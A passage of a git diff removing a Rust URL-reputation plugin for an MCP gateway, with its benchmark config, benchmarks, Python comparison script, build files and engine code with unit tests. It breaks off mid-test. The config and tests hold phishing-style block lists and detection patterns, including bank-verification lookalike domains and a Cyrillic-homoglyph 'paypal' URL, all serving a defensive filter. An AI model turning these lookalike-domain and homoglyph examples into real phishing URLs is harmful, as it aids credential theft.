"https://bank-verify-hub.test/verify", - "https://bank-security-portal.test/authenticate", - "https://bank-verify-system.test/verify", - "https://bank-security-hub.test/confirm", - "https://bank-verify-service.test/verify", - "https://bank-security-alert.test/authenticate", - "https://bank-verify-portal.test/verify", - "https://bank-security-center.test/confirm", - "https://lucky-games.test/games/slots", - "https://win-prizes.test/register/bonus", - "https://game-paradise.test/play/roulette", - "https://free-downloads.test/movies/latest", - "https://pirate-software.test/software/adobe", - "https://crack-tools.test/windows/activator", - "https://serial-generator.test/office/2026", - "https://warez-downloads.test/games/premium", - "https://dark-marketplace.test/marketplace", - "https://exploit-database.test/vulnerabilities/cve-2026", - "https://mega-jackpot.test/jackpot/progressive", - "https://royal-games.test/live/dealer", - "https://jackpot-online.test/spin/wheel", - "https://bet-sports.test/sports/betting", - "https://crypto-invest.test/invest/now", - "https://torrent-search.test/search", - "https://movies-stream.test/watch/free", - "https://key-generator.test/generator/tool", - "https://nulled-downloads.test/premium", - "https://crack-releases.test/latest/releases", - "https://keygen-tools.test/activator/windows", - "https://warez-software.test/software/full", - "https://pirate-proxy.test/browse", - "https://torrent-proxy-a.test/search", - "https://torrent-mirror-a.test/movies", - "https://torrent-proxy-b.test/trending", - "https://movie-downloads.test/latest", - "https://series-streams.test/shows", - "https://torrent-proxy-c.test/search", - "https://torrent-search-b.test/find", - "https://pirate-mirror.test/browse", - "https://torrent-proxy-d.test/search", - "https://torrent-mirror-b.test/files", - "https://torrent-proxy-e.test/torrents", - "https://torrent-mirror-c.test/search", - "https://torrent-proxy-f.test/movies", - "https://torrent-mirror-d.test/forum", - "https://anime-torrents.test/anime", - "https://anime-search.test/search", - "https://anime-downloads.test/series" - ], - "blocked_patterns": [ - "verify", - "confirmation", - "authentication", - "secure-alert", - "wallet-verification", - "security-check", - "support-portal", - "account-review", - "business-verification", - "file-confirm", - "account-confirm", - "payment-auth", - "subscription-verify", - "security-alert", - "unusual-activity", - "security-notify", - "member-confirm", - "online-verify", - "account-alert", - "fraud-prevent", - "security-verify", - "card-verify", - "security-center", - "verify-portal", - "alert-center", - "account-verify", - "online-secure", - "verify-center", - "security-notify", - "account-alert", - "verify-system", - "security-portal", - "verify-service" - ], - "blocked_domains": [ - "lucky-games.test", - "win-prizes.test", - "game-paradise.test", - "free-downloads.test", - "pirate-software.test", - "crack-tools.test", - "serial-generator.test", - "warez-downloads.test", - "dark-marketplace.test", - "exploit-database.test", - "mega-jackpot.test", - "royal-games.test", - "jackpot-online.test", - "bet-sports.test", - "crypto-invest.test", - "torrent-search.test", - "movies-stream.test", - "key-generator.test", - "nulled-downloads.test", - "crack-releases.test", - "keygen-tools.test", - "warez-software.test", - "pirate-proxy.test", - "torrent-proxy-a.test", - "torrent-mirror-a.test", - "torrent-proxy-b.test", - "movie-downloads.test", - "series-streams.test", - "torrent-proxy-c.test", - "torrent-search-b.test", - "pirate-mirror.test", - "torrent-proxy-d.test", - "torrent-mirror-b.test", - "torrent-proxy-e.test", - "torrent-mirror-c.test", - "torrent-proxy-f.test", - "torrent-mirror-d.test", - "anime-torrents.test", - "anime-search.test", - "anime-downloads.test" - ], - "url_multiplier": 500 -} diff --git a/plugins_rust/url_reputation/benches/url_validation.rs b/plugins_rust/url_reputation/benches/url_validation.rs deleted file mode 100644 index e0f5d0f19b..0000000000 --- a/plugins_rust/url_reputation/benches/url_validation.rs +++ /dev/null @@ -1,241 +0,0 @@ -use criterion::{Criterion, criterion_group, criterion_main}; -use std::collections::HashSet; -use std::hint::black_box; -use url_reputation_rust::engine::URLReputationPlugin; -use url_reputation_rust::types::URLReputationConfig; - -fn create_plugin_with_heuristics() -> URLReputationPlugin { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: true, - entropy_threshold: 3.65, - block_non_secure_http: true, - }; - URLReputationPlugin::new(config) -} - -fn benchmark_full_heuristic_validation(c: &mut Criterion) { - let plugin = create_plugin_with_heuristics(); - - // Test URLs that trigger all heuristic checks (largest pathway) - let test_urls = vec![ - "https://legitimate-domain-name.com/path/to/resource", - "https://another-valid-site.org/api/v1/endpoint", - "https://example-website.net/some/long/path/here", - "https://test-domain-123.com/resource", - "https://my-secure-site.io/data/fetch", - ]; - - c.bench_function("full_heuristic_validation", |b| { - b.iter(|| { - for url in &test_urls { - black_box(plugin.validate_url(black_box(url))); - } - }) - }); -} - -fn benchmark_single_url_heuristic(c: &mut Criterion) { - let plugin = create_plugin_with_heuristics(); - let url = "https://legitimate-domain-name.com/path/to/resource"; - - c.bench_function("single_url_full_heuristic", |b| { - b.iter(|| { - black_box(plugin.validate_url(black_box(url))); - }) - }); -} - -fn benchmark_complex_url_heuristic(c: &mut Criterion) { - let plugin = create_plugin_with_heuristics(); - // Complex URL with query parameters and fragments - let url = "https://complex-domain-name.com/api/v2/users?id=123&filter=active&sort=desc#section"; - - c.bench_function("complex_url_full_heuristic", |b| { - b.iter(|| { - black_box(plugin.validate_url(black_box(url))); - }) - }); -} - -fn benchmark_high_entropy_detection(c: &mut Criterion) { - let plugin = create_plugin_with_heuristics(); - // URL with high entropy domain (should fail entropy check) - let url = "https://axb12c34d56ef78gh90ij.com/path"; - - c.bench_function("high_entropy_detection", |b| { - b.iter(|| { - black_box(plugin.validate_url(black_box(url))); - }) - }); -} - -fn benchmark_unicode_security_check(c: &mut Criterion) { - let plugin = create_plugin_with_heuristics(); - // URL with mixed scripts (should fail unicode security) - let url = "https://pаypal.com/login"; // Contains Cyrillic 'а' - - c.bench_function("unicode_security_check", |b| { - b.iter(|| { - black_box(plugin.validate_url(black_box(url))); - }) - }); -} - -fn benchmark_tld_validation(c: &mut Criterion) { - let plugin = create_plugin_with_heuristics(); - // URL with invalid TLD - let url = "https://test-domain.invalidtld/path"; - - c.bench_function("tld_validation", |b| { - b.iter(|| { - black_box(plugin.validate_url(black_box(url))); - }) - }); -} - -fn benchmark_ipv4_validation(c: &mut Criterion) { - let plugin = create_plugin_with_heuristics(); - // IPv4 URL (skips heuristic checks) - let url = "https://192.168.1.1:8080/api"; - - c.bench_function("ipv4_validation", |b| { - b.iter(|| { - black_box(plugin.validate_url(black_box(url))); - }) - }); -} - -fn benchmark_ipv6_validation(c: &mut Criterion) { - let plugin = create_plugin_with_heuristics(); - // IPv6 URL (skips heuristic checks) - let url = "https://[2001:0db8:85a3:0000:0000:8a2e:0370:7334]:8080/api"; - - c.bench_function("ipv6_validation", |b| { - b.iter(|| { - black_box(plugin.validate_url(black_box(url))); - }) - }); -} - -fn benchmark_blocked_pattern_matching(c: &mut Criterion) { - // Create plugin with multiple blocked patterns - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: vec![ - r".*phishing.*".to_string(), - r".*malware.*".to_string(), - r".*crypto-scam.*".to_string(), - r".*fake-bank.*".to_string(), - r".*suspicious.*".to_string(), - ], - use_heuristic_check: false, - entropy_threshold: 3.65, - block_non_secure_http: false, - }; - let plugin = URLReputationPlugin::new(config); - - // Test URLs that should match blocked patterns - let blocked_urls = vec![ - "https://example.com/phishing-page", - "https://malware-site.com/download", - "https://crypto-scam.net/invest", - "https://fake-bank-login.com/auth", - "https://suspicious-domain.org/data", - ]; - - c.bench_function("blocked_pattern_matching", |b| { - b.iter(|| { - for url in &blocked_urls { - black_box(plugin.validate_url(black_box(url))); - } - }) - }); -} - -fn benchmark_allowed_pattern_matching(c: &mut Criterion) { - // Create plugin with allowed patterns - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: vec![ - r"https://api\.trusted\.com/.*".to_string(), - r"https://cdn\.safe\.net/.*".to_string(), - r"https://.*\.internal\.corp/.*".to_string(), - ], - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: false, - entropy_threshold: 3.65, - block_non_secure_http: false, - }; - let plugin = URLReputationPlugin::new(config); - - // Test URLs that should match allowed patterns - let allowed_urls = vec![ - "https://api.trusted.com/v1/users", - "https://cdn.safe.net/assets/image.png", - "https://service.internal.corp/data", - ]; - - c.bench_function("allowed_pattern_matching", |b| { - b.iter(|| { - for url in &allowed_urls { - black_box(plugin.validate_url(black_box(url))); - } - }) - }); -} - -fn benchmark_pattern_no_match(c: &mut Criterion) { - // Create plugin with patterns that won't match - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: vec![ - r".*phishing.*".to_string(), - r".*malware.*".to_string(), - r".*crypto-scam.*".to_string(), - ], - use_heuristic_check: false, - entropy_threshold: 3.65, - block_non_secure_http: false, - }; - let plugin = URLReputationPlugin::new(config); - - // Test URLs that won't match any patterns (worst case - checks all patterns) - let clean_urls = vec![ - "https://legitimate-site.com/page", - "https://normal-domain.org/api", - "https://safe-website.net/resource", - ]; - - c.bench_function("pattern_no_match", |b| { - b.iter(|| { - for url in &clean_urls { - black_box(plugin.validate_url(black_box(url))); - } - }) - }); -} - -criterion_group!( - benches, - benchmark_full_heuristic_validation, - benchmark_single_url_heuristic, - benchmark_complex_url_heuristic, - benchmark_high_entropy_detection, - benchmark_unicode_security_check, - benchmark_tld_validation, - benchmark_ipv4_validation, - benchmark_ipv6_validation, - benchmark_blocked_pattern_matching, - benchmark_allowed_pattern_matching, - benchmark_pattern_no_match -); -criterion_main!(benches); diff --git a/plugins_rust/url_reputation/compare_performance.py b/plugins_rust/url_reputation/compare_performance.py deleted file mode 100644 index d168ed7d7f..0000000000 --- a/plugins_rust/url_reputation/compare_performance.py +++ /dev/null @@ -1,241 +0,0 @@ -import asyncio -import argparse -import json -from pathlib import Path -from unittest.mock import patch -import statistics -import sys -import time -from typing import Any, Literal -from mcpgateway.plugins.framework import ( - PluginConfig, - ResourceHookType, -) - -# Try to import Rust implementation -try: - from url_reputation_rust import URLReputationPlugin as RustPlugin - RUST_AVAILABLE = True -except ImportError: - RUST_AVAILABLE = False - print("Rust implementation not available.") - - -# Add plugins directory to path to import Python implementation -plugins_path = Path(__file__).parent.parent.parent / "plugins" / "url_reputation" -if plugins_path.exists(): - sys.path.insert(0, str(plugins_path)) -else: - print(f"Warning: Python implementation path not found: {plugins_path}") - print("Benchmark will only test Rust implementation if available.") - - -class Payload: - def __init__(self, url): - self.uri = url - - -def load_bench_config(config_path: str = "bench_config.json"): - """Load benchmark configuration from JSON file.""" - config_file = Path(__file__).parent / config_path - if not config_file.exists(): - raise FileNotFoundError(f"Benchmark config file not found: {config_file}") - - with open(config_file, 'r') as f: - return json.load(f) - - -def generate_payloads(size: int, urls: list[str], url_multiplier: int = 1): - """Return a list of urls to be used in the benchmark""" - # Apply url_multiplier to expand the URL list - expanded_urls = urls * url_multiplier - url_count = len(expanded_urls) - repeated = expanded_urls * (size // url_count) - remaining = expanded_urls[:(size % url_count)] - - return [Payload(url) for url in repeated + remaining] - - -async def run_benchmark(language: Literal["python", "rust"], config: PluginConfig, iterations: int, urls: list[str], url_multiplier: int = 1, warmup: int = 5): - """Run benchmark for specified language implementation.""" - if language == "rust" and not RUST_AVAILABLE: - return [], 0 - - if language == "python": - try: - import url_reputation - with patch.object(url_reputation, '_RUST_AVAILABLE', False): - from url_reputation import URLReputationPlugin - plugin = URLReputationPlugin(config) - - # Warmup phase - for payload in generate_payloads(warmup, urls, url_multiplier): - await plugin.resource_pre_fetch(payload, None) - - # Actual benchmark - times = [] - for payload in generate_payloads(iterations, urls, url_multiplier): - start = time.perf_counter() - await plugin.resource_pre_fetch(payload, None) - times.append(time.perf_counter() - start) - - return times, len(times) - except ImportError as e: - print(f"Warning: Could not import Python implementation: {e}") - return [], 0 - else: - try: - import url_reputation - with patch.object(url_reputation, '_RUST_AVAILABLE', True): - from url_reputation import URLReputationPlugin - plugin = URLReputationPlugin(config) - - # Warmup phase - for payload in generate_payloads(warmup, urls, url_multiplier): - await plugin.resource_pre_fetch(payload, None) - - # Actual benchmark - times = [] - for payload in generate_payloads(iterations, urls, url_multiplier): - start = time.perf_counter() - await plugin.resource_pre_fetch(payload, None) - times.append(time.perf_counter() - start) - - return times, len(times) - except ImportError as e: - print(f"Warning: Could not import url_reputation wrapper: {e}") - return [], 0 - - -async def run_scenario(name: str, config: PluginConfig, iterations: int, urls: list[str], url_multiplier: int = 1, warmup: int = 5): - """Run benchmark scenario and return results.""" - print(f"Running scenario: {name}...", end=" ", flush=True) - - results = {} - for language in ["python", "rust"]: - benchmark_result = await run_benchmark(language, config, iterations, urls, url_multiplier, warmup) - - if benchmark_result is None or len(benchmark_result) != 2: - if language == "rust": - print("✗ (Rust not available)") - return None - continue - - times, count = benchmark_result - - if not times: - if language == "rust": - print("✗ (Rust not available)") - return None - continue - - mean = statistics.mean(times) * 1_000_000 - median = statistics.median(times) * 1_000_000 - stdev = statistics.stdev(times) * 1_000_000 if len(times) > 1 else 0 - results[language] = {"mean": mean, "median": median, "stdev": stdev, "count": count} - - if len(results) < 2: - print("✗ (incomplete)") - return None - - speedup = results["python"]["mean"] / results["rust"]["mean"] if results["rust"]["mean"] > 0 else 0 - print(f"✓ (speedup: {speedup:.2f}x)") - - return { - "name": name, - "python": results["python"], - "rust": results["rust"], - "speedup": speedup - } - - -async def main(): - parser = argparse.ArgumentParser(description="Rust vs Python benchmark for URL reputation plugin") - parser.add_argument("--iterations", type=int, default=500_000, help="Iterations per scenario") - parser.add_argument("--warmup", type=int, default=1000, help="Warmup iterations") - parser.add_argument("--config", type=str, default="bench_config.json", help="Path to benchmark config file") - args = parser.parse_args() - - print("🔍 URL Reputation benchmark (Native Python Objects)") - print(f"Iterations: {args.iterations} (+ {args.warmup} warmup)") - print(f"Rust available: {'✓' if RUST_AVAILABLE else '✗'}") - - # Load benchmark configuration - try: - bench_config = load_bench_config(args.config) - except FileNotFoundError as e: - print(f"❌ Error: {e}") - sys.exit(1) - except json.JSONDecodeError as e: - print(f"❌ Error parsing config file: {e}") - sys.exit(1) - - # Extract configuration - urls = bench_config.get("urls", []) - blocked_patterns = bench_config.get("blocked_patterns", []) - blocked_domains = bench_config.get("blocked_domains", []) - url_multiplier = bench_config.get("url_multiplier", 1) - - if not urls: - print("❌ Error: No URLs found in config file") - sys.exit(1) - - print(f"Loaded {len(urls)} URLs, {len(blocked_patterns)} patterns, {len(blocked_domains)} domains") - print(f"URL multiplier: {url_multiplier}x") - - # Create plugin configuration - plugin_config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ - "blocked_domains": blocked_domains, - "blocked_patterns": blocked_patterns, - }, - ) - - # Run benchmark - result = await run_scenario( - "URL Reputation Benchmark", - plugin_config, - args.iterations, - urls, - url_multiplier, - args.warmup - ) - - # Print results - print(f"\n{'=' * 100}") - print("📊 BENCHMARK RESULTS") - print(f"{'=' * 100}") - - if not result: - print("❌ No results to display") - return - - # Detailed results - print(f"\n{'Metric':<30} {'Python':<25} {'Rust':<25}") - print(f"{'-' * 30} {'-' * 25} {'-' * 25}") - - python_mean = result["python"]["mean"] - python_median = result["python"]["median"] - python_stdev = result["python"]["stdev"] - rust_mean = result["rust"]["mean"] - rust_median = result["rust"]["median"] - rust_stdev = result["rust"]["stdev"] - speedup = result["speedup"] - - print(f"{'Mean (μs/iter)':<30} {python_mean:>20.2f} {rust_mean:>20.2f}") - print(f"{'Median (μs/iter)':<30} {python_median:>20.2f} {rust_median:>20.2f}") - print(f"{'Std Dev (μs/iter)':<30} {python_stdev:>20.2f} {rust_stdev:>20.2f}") - print(f"{'Iterations':<30} {result['python']['count']:>20} {result['rust']['count']:>20}") - - print(f"\n{'-' * 100}") - print(f"🚀 Speedup: {speedup:.2f}x faster with Rust") - print(f"{'=' * 100}") - print("✅ Benchmark complete!") - print(f"{'=' * 100}\n") - - -if __name__ == "__main__": - asyncio.run(main()) diff --git a/plugins_rust/url_reputation/deny.toml b/plugins_rust/url_reputation/deny.toml deleted file mode 100644 index 142f5157ff..0000000000 --- a/plugins_rust/url_reputation/deny.toml +++ /dev/null @@ -1,27 +0,0 @@ -# Cargo-deny config: license and policy checks for this crate. -# See https://embarkstudios.github.io/cargo-deny/ - -[licenses] -unused-allowed-license = "allow" -confidence-threshold = 0.95 -allow = [ - # Currently used across our Rust projects - "Apache-2.0", - "BSD-2-Clause", - "BSD-3-Clause", - "BSL-1.0", - "CC0-1.0", - "ISC", - "LGPL-2.1-or-later", - "MIT", - "MIT-0", - "OpenSSL", - "Unicode-3.0", - "Unicode-DFS-2016", - "Unlicense", - "Zlib", - # Common safe licenses in the Rust ecosystem - "0BSD", - "Apache-2.0 WITH LLVM-exception", - "Unicode-DFS-2015", -] diff --git a/plugins_rust/url_reputation/pyproject.toml b/plugins_rust/url_reputation/pyproject.toml deleted file mode 100644 index 7b2746eaf0..0000000000 --- a/plugins_rust/url_reputation/pyproject.toml +++ /dev/null @@ -1,21 +0,0 @@ -[build-system] -requires = ["maturin>=1.4,<2.0"] -build-backend = "maturin" - -[project] -name = "mcpgateway-url-reputation" -version = "0.1.1" -description = "High-performance URL reputation validation for MCP Gateway" -authors = [{ name = "ContextForge Contributors" }] -license = { text = "Apache-2.0" } -requires-python = ">=3.11" -classifiers = [ - "Programming Language :: Rust", - "Programming Language :: Python :: Implementation :: CPython", - "Programming Language :: Python :: 3.11", - "Programming Language :: Python :: 3.12", -] - -[tool.maturin] -module-name = "url_reputation_rust" -features = ["pyo3/extension-module"] diff --git a/plugins_rust/url_reputation/python/url_reputation_rust/__init__.pyi b/plugins_rust/url_reputation/python/url_reputation_rust/__init__.pyi deleted file mode 100644 index 7a162dd15f..0000000000 --- a/plugins_rust/url_reputation/python/url_reputation_rust/__init__.pyi +++ /dev/null @@ -1,5 +0,0 @@ -from typing import Any - -class URLReputationPlugin: - def __init__(self, config: Any) -> None: ... - def validate_url_py(self, url: str) -> dict: ... diff --git a/plugins_rust/url_reputation/src/engine.rs b/plugins_rust/url_reputation/src/engine.rs deleted file mode 100644 index 756969300e..0000000000 --- a/plugins_rust/url_reputation/src/engine.rs +++ /dev/null @@ -1,707 +0,0 @@ -use crate::{ - filters::{ - heuristic, - patterns::{self, in_domain_list}, - }, - types::{PluginViolation, URLPluginResult, URLReputationConfig}, -}; -use log::warn; -use pyo3::{prelude::*, types::PyDict}; -use regex::Regex; -use std::{ - collections::HashMap, - net::{Ipv4Addr, Ipv6Addr}, -}; -use url::Url; - -#[pyclass] -pub struct URLReputationPlugin { - config: URLReputationConfig, - allowed_patterns: Vec, // store compiled regex - blocked_patterns: Vec, -} - -#[pymethods] -impl URLReputationPlugin { - #[new] - pub fn new(config: URLReputationConfig) -> Self { - // Normalize domains to lowercase for case-insensitive matching - let config = config.normalize_domains(); - - let allowed_patterns = config - .allowed_patterns - .iter() - .filter_map(|p| match Regex::new(p) { - Ok(regex) => Some(regex), - Err(e) => { - warn!("Failed to compile allowed pattern '{}': {}", p, e); - None - } - }) - .collect(); - let blocked_patterns = config - .blocked_patterns - .iter() - .filter_map(|p| match Regex::new(p) { - Ok(regex) => Some(regex), - Err(e) => { - warn!("Failed to compile blocked pattern '{}': {}", p, e); - None - } - }) - .collect(); - - Self { - config, - allowed_patterns, - blocked_patterns, - } - } - // exposed function return python dict - fn validate_url_py(&self, py: Python, url: &str) -> PyResult> { - let result = self.validate_url(url); - result.to_py_dict(py) - } - - pub fn validate_url(&self, url: &str) -> URLPluginResult { - // Parse the original URL; the `url` crate normalises scheme and host to lowercase. - // Pattern matching runs against the trimmed (but otherwise unmodified) URL so - // that path/query comparisons remain case-sensitive per RFC 3986. - let url_trimmed = url.trim(); - let parsed_url = match Url::parse(url_trimmed) { - Ok(url) => url, - Err(_) => { - return URLPluginResult { - continue_processing: false, - violation: Some(PluginViolation { - reason: "Could not parse url".to_string(), - description: format!("URL {} is blocked", url), - code: "URL_REPUTATION_BLOCK".to_string(), - details: Some(HashMap::from([("url".to_string(), url.to_string())])), - }), - }; - } - }; - // host_str() is already lowercase per the URL spec. - let domain = match parsed_url.host_str() { - Some(domain) => domain, - None => { - return URLPluginResult { - continue_processing: false, - violation: Some(PluginViolation { - reason: "Could not parse domain".to_string(), - description: format!("URL {} is blocked", url), - code: "URL_REPUTATION_BLOCK".to_string(), - details: Some(HashMap::from([("url".to_string(), url.to_string())])), - }), - }; - } - }; - - let ip_domain = domain.parse::().is_ok() - || domain - .trim_start_matches('[') - .trim_end_matches(']') - .parse::() - .is_ok(); - - let scheme = parsed_url.scheme(); - - // check whitelist - if in_domain_list(domain, &self.config.whitelist_domains) { - return URLPluginResult { - continue_processing: true, - violation: None, - }; - } - // check for allowed patterns - if patterns::in_allow_patterns_regex(url_trimmed, &self.allowed_patterns) { - return URLPluginResult { - continue_processing: true, - violation: None, - }; - } - // check non secure http - if self.config.block_non_secure_http && scheme != "https" { - return URLPluginResult { - continue_processing: false, - violation: Some(PluginViolation { - reason: "Blocked non secure http url".to_string(), - description: format!("URL {} is blocked", url), - code: "URL_REPUTATION_BLOCK".to_string(), - details: Some(HashMap::from([("url".to_string(), url.to_string())])), - }), - }; - } - // check blocked domains - if in_domain_list(domain, &self.config.blocked_domains) { - return URLPluginResult { - continue_processing: false, - violation: Some(PluginViolation { - reason: "Domain in blocked set".to_string(), - description: format!("Domain '{}' in blocked set", domain), - code: "URL_REPUTATION_BLOCK".to_string(), - details: Some(HashMap::from([("domain".to_string(), domain.to_string())])), - }), - }; - } - // check for blocked patterns in the url - if patterns::in_blocked_patterns_regex(url_trimmed, &self.blocked_patterns) { - return URLPluginResult { - continue_processing: false, - violation: Some(PluginViolation { - reason: "Blocked pattern".to_string(), - description: "URL matches blocked pattern".to_string(), - code: "URL_REPUTATION_BLOCK".to_string(), - details: Some(HashMap::from([( - "url".to_string(), - url_trimmed.to_string(), - )])), - }), - }; - } - // skip heuristic checks if the domain is an IP address - if !ip_domain && self.config.use_heuristic_check { - if !heuristic::passed_entropy(domain, self.config.entropy_threshold) { - return URLPluginResult { - continue_processing: false, - violation: Some(PluginViolation { - reason: "High entropy domain".to_string(), - description: format!("Domain exceeds entropy threshold: {}", domain), - code: "URL_REPUTATION_BLOCK".to_string(), - details: Some(HashMap::from([("domain".to_string(), domain.to_string())])), - }), - }; - } - // check for valid tld - if !heuristic::is_tld_legal(domain) { - return URLPluginResult { - continue_processing: false, - violation: Some(PluginViolation { - reason: "Illegal TLD".to_string(), - description: format!("Domain TLD not legal: {}", domain), - code: "URL_REPUTATION_BLOCK".to_string(), - details: Some(HashMap::from([("domain".to_string(), domain.to_string())])), - }), - }; - } - // check for unicode security - if !heuristic::is_domain_unicode_secure(domain) { - return URLPluginResult { - continue_processing: false, - violation: Some(PluginViolation { - reason: "Domain unicode is not secure".to_string(), - description: format!("Domain unicode is not secure for domain: {}", domain), - code: "URL_REPUTATION_BLOCK".to_string(), - details: Some(HashMap::from([("domain".to_string(), domain.to_string())])), - }), - }; - } - } - URLPluginResult { - continue_processing: true, - violation: None, - } - } -} - -#[cfg(test)] -mod tests { - use std::collections::HashSet; - - use super::*; - - #[test] - fn test_whitelisted_domain() { - let config = URLReputationConfig { - whitelist_domains: HashSet::from(["example.com".to_string()]), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: false, - entropy_threshold: 0.0, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - let url = "https://example.com"; - - let result = plugin.validate_url(url); - assert!(result.continue_processing); - } - - #[test] - fn test_blocked_domain() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::from(["bad.example".to_string()]), - blocked_patterns: Vec::new(), - use_heuristic_check: false, - entropy_threshold: 0.0, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - let url = "https://api.bad.example/v1"; - - let result = plugin.validate_url(url); - assert!(!result.continue_processing); - assert_eq!(result.violation.unwrap().reason, "Domain in blocked set"); - } - - #[test] - fn test_non_secure_http() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: true, - entropy_threshold: 5.0, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - let url = "http://ibm.com"; - - let result = plugin.validate_url(url); - assert!(!result.continue_processing); - assert_eq!( - result.violation.unwrap().reason, - "Blocked non secure http url" - ); - } - - #[test] - fn test_allowed_pattern() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: vec!["0932".to_string(), "safe\\.com/allowed".to_string()], - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: false, - entropy_threshold: 0.0, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - let url = "https://safe.com/allowed"; - - let result = plugin.validate_url(url); - assert!(result.continue_processing); - } - - #[test] - fn test_blocked_pattern() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: vec!["crypto.*".to_string()], - use_heuristic_check: false, - entropy_threshold: 0.0, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - let url = "https://safe.com/crypto-invest"; - - let result = plugin.validate_url(url); - assert!(!result.continue_processing); - assert_eq!(result.violation.unwrap().reason, "Blocked pattern"); - } - - #[test] - fn test_valid_url() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: vec!["crypto.*".to_string()], - use_heuristic_check: false, - entropy_threshold: 3.65, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - let url = "https://rust-lang.org"; - - let result = plugin.validate_url(url); - assert!(result.continue_processing); - } - - #[test] - fn test_could_not_parse_url_invalid_character() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: vec!["crypto.*".to_string()], - use_heuristic_check: false, - entropy_threshold: 3.65, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - let url = "ht!tp://example.com"; // Zero-width joiner U+200D - let result = plugin.validate_url(url); - assert!(!result.continue_processing); - assert!(result.violation.unwrap().reason == "Could not parse url") - } - - #[test] - fn test_could_not_parse_domain_invalid_character() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: vec![], - use_heuristic_check: true, - entropy_threshold: 5.0, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - let url = "mailto:user@example.com"; // Zero-width joiner U+200D - let result = plugin.validate_url(url); - assert!(!result.continue_processing); - assert!(result.violation.unwrap().reason == "Could not parse domain") - } - - #[test] - fn test_heuristic_high_entropy_domain() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: vec![], - use_heuristic_check: true, - entropy_threshold: 3.65, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - let url = "https://axb12c34d56ef.com"; - let result = plugin.validate_url(url); - assert!(!result.continue_processing); - assert!(result.violation.unwrap().reason == "High entropy domain"); - } - - #[test] - fn test_heuristic_invalid_tld() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: vec![], - use_heuristic_check: true, - entropy_threshold: 5.65, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - let url = "https://test.daks/test"; - - let result = plugin.validate_url(url); - assert!(!result.continue_processing); - assert!(result.violation.unwrap().reason == "Illegal TLD"); - } - - #[test] - fn test_heuristic_domain_too_long() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: true, - entropy_threshold: 5.0, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - - let domain_label = "long_domain".repeat(30); - let url = format!("https://{}.com", domain_label); - let result = plugin.validate_url(&url); - - assert!(!result.continue_processing); - assert_eq!( - result.violation.unwrap().reason, - "Domain unicode is not secure" - ); - } - - #[test] - fn test_is_domain_unicode_secure_mixed_scripts() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: true, - entropy_threshold: 5.0, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - - let url = "https://pаypal.com/test"; // Cyrillic 'а' - let result = plugin.validate_url(url); - - assert!(!result.continue_processing); - assert_eq!( - result.violation.unwrap().reason, - "Domain unicode is not secure" - ); - } - - #[test] - fn test_is_domain_unicode_secure_pure_ascii() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: true, - entropy_threshold: 5.0, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - - let url = "https://domain.com"; - let result = plugin.validate_url(url); - - assert!(result.continue_processing); - } - - #[test] - fn test_is_domain_unicode_secure_empty_label() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: true, - entropy_threshold: 5.0, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - - let url = "https://my..com"; - let result = 